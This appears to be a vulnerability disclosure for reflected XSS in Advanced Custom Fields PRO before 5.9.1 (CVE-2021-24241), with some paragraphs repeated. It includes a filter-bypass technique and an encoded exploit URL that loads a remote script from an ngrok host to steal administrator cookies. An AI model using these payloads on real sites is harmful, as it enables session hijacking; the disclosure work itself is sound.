WordPress allows 'Cross-site Scripting Reflected' in resource edit.php, because the call an update page of Advanced Custom Fields PRO (Versions before 5.9.1) plugin, enable injections of JavaScript code.
However, after of try some payloads I see the [space] character is replaced in the response with underscore character [ _ ], the same goes for dot character [ . ], whereby not is possible inject useful payloads for extract for example the cookie of the session.
I found a way to bypass this problem, in the request replace [space] character for [%0c ] and dot character [ . ] for equivalent html encode, this content is rendered successfully due the response is an HTML page.
Now, is time for making the script for sending cookies of administrator user to evil server of hacker, for example
WordPress allows 'Cross-site Scripting Reflected' in resource edit.php, because the call an update page of Advanced Custom Fields PRO (Versions before 5.9.1) plugin, enable injections of JavaScript code.
Steps to reproduce the vulnerability
Add the payload XSS at the end of the url, so:
https://SiteWithWordpress/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"><script>alert('XSS')</script>
However, after of try some payloads I see the [space] character is replaced in the response with underscore character [ _ ], the same goes for dot character [ . ], whereby not is possible inject useful payloads for extract for example the cookie of the session.

I found a way to bypass this problem, in the request replace [space] character for [%0c ] and dot character [ . ] for equivalent html encode, this content is rendered successfully due the response is an HTML page.

Now, is time for making the script for sending cookies of administrator user to evil server of hacker, for example

Of course, previously must encode in URL the payload that calls previous script, so https://WordPressDomain/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"XSS%22%3e%3c%73%63%72%69%70%74%0c%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%32%65%32%30%30%32%66%39%26%23%78%32%65%3b%6e%67%72%6f%6b%26%23%78%32%65%3b%69%6f%2f%72%65%71%75%65%73%74%26%23%78%32%65%3b%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e

Send the payload and you will see two request, the first make a promise for sending the cookies and second is where the promise is executed.

Now the hacker has cookies of administrator user in the evil server.

Remediation
I held messages with the dev team of Advanced Custom Fields, they fixed the vulnerability in the versión 5.9.1 of ACF PRO, here is the report:
https://www.advancedcustomfields.com/blog/acf-5-9-1-release/
https://wpscan.com/vulnerability/d1e9c995-37bd-4952-b88e-945e02e3c83f
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24241
The text was updated successfully, but these errors were encountered: